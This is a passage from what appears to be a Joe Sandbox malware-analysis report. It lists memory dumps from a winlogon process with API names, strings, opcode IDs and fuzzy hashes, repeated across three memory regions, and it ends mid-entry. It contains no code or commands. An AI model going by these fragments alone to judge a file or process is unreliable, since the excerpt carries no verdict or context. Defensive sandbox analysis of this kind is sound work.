                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2A28DF), ref: 000001CA7D2A2A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 883afdda5ac88cf6514580bd6892867edb55701f6eb5cb203455b40a889b7c34
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 5E91F233A5075999FB528F659450BEE37A0FF94B8CF846106DE0A6BA85DB36C04783C3
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D1F28DF), ref: 000001CA7D1F2A12
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: 5eb7d5947bc20cfa67c7895d0bc5de5f10d0b69c3d0a7686c240678f5a04625b
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: E391EF33F5275899FB62CF659450BED3BA0BB54B8CF844146DE0A93A85DB36C446C383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 309fc4a10813a887c16493d1ce2c5572945cc3e6c6069e0ff5507602679b0d55
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 99111836B50F088AFB01CB60E8547AA33A4FB59758F840E21DE6D967A4EB78C15583C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: a1ec85385bb10c050ff026c888441d939cb2e74fe620a6861c714d04218da524
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 0371C037A84B8956F7369E26D940BEA7794FF84789FD10016DD0963B88DA36C50287C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 5d50e4c69690dc07a888c6352a7c53a26a02212cebad6fb895a16883e0e52a6b
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: C371C537A40B9951F7369E26D864BEA7794FB84B8AF85101ADD0943B88DE76C600C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: d06f1d6a4c4548bdff1e7c612d8bf8de8a9f368b65ed0bfbfd455b76740dd300
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 30511637A8878841F626CE26A454BEA7751FF84789FC60025ED4973B89DA37C406C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 2c1d7f038cfc8afa535b49b84af1afe38805e8b2e7a7ce4dff7cd2b815606423
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: E1410973A15B8886F751CF25E804BDAB7A0FB88788F844021EE4D9B744EB39C502C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 4851d813fab70bc34ea02260f48b8835ec91dfadefddb3b7f09ec63637b0023d
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: B9115E32614B4482EB218B15F40468A77E5FBC8B98FA84224EE8D07B58DF3DC552CB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 2c9b86ec9324a70017c97faafd6a1d8197db821130e30e04182a7cd2d4a5eeb9
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 4E116D73615B8482FB228F15F404689B7E1FB88B98F984220EE8D47B64DF3DC551CB42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
